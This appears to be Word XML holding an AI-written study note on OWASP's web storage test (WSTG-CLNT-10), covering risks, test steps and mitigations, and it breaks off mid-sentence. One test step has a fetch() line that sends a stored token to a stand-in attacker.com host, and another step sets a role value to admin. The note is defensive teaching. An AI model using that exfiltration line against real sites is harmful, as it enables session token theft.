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6121D" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Perfect </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👍</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> Let’s cover </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>precise notes for “Testing Web Storage” (WSTG-CLNT-10)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1921B6AF" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:pict w14:anchorId="24446643">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A0A60" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing Web Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281CE48F" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77791A10" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">To test if the application securely uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTML5 Web Storage APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9C907" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> → persists data (even after browser close).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1FD10" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> → lasts until tab/browser is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE641D3" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Both are accessible via JavaScript → if </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS exists</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t>, stored data can be stolen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087834E4" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:pict w14:anchorId="6F13EEE1">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691BE43" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203CC2FE" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56115C05" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Storing </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tokens, session IDs, passwords, PII</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73040C2C" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Unlike cookies, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">not protected by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> → JS can read it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D53E473" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16700258" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> survives logout/close → if stolen, can be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216B977" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No Expiry Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5FFB8" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Unless explicitly coded, stored values remain forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0087D" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS Amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A128AA9" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Any XSS = full compromise of storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E5AC7" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:pict w14:anchorId="6AC02612">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD2E8E" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> How to Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147FC226" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Inspect Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447E701" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> → Application → Storage → Local/Session Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575C882" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A1771" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Access tokens, JWTs, CSRF tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C821954" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>PII (emails, phone numbers, credentials).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761265BB" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Try Reading Data via Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5BC4E" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:t>console.log(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34A5E277" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:lastRenderedPageBreak/>
        <w:t>console.log(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5AEDB8CF" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. XSS Payload Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD7C546" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>If XSS possible, attempt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7F3BC" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>"https://attacker.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>steal?data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage.getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>("token")</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="280E3CF4" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Confirms exfiltration risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45452552" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Tampering Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B59BFA" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Modify values manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D697D" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage.setItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>("role", "admin"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B34A591" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Refresh app → check if logic depends on client-side storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC09E9E" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:pict w14:anchorId="688175F3">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5191DF73" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643626A0" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Never store sensitive data in Web Storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C74BEE4" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Prefer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, Secure cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> for session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBE07B" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Clear storage on logout (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage.clear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296FBC9B" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve">Apply strong </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> (CSP, sanitization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA34BC4" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A966F8">
        <w:t>Validate all security decisions server-side (not based on client-stored data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E86A8" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:pict w14:anchorId="4996DD51">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A09672" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Takeaway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:br/>
        <w:t xml:space="preserve">Web Storage is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not secure for secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t>. Always assume it can be read/modified by attackers via XSS or local tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B89531" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:pict w14:anchorId="3BB557CC">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C40435B" w14:textId="77777777" w:rsidR="00A966F8" w:rsidRPr="00A966F8" w:rsidRDefault="00A966F8" w:rsidP="00A966F8">
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> Do you want me to also prepare a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checklist of sensitive items</w:t>
      </w:r>
      <w:r w:rsidRPr="00A966F8">
        <w:t xml:space="preserve"> you should always search for in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A966F8">
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
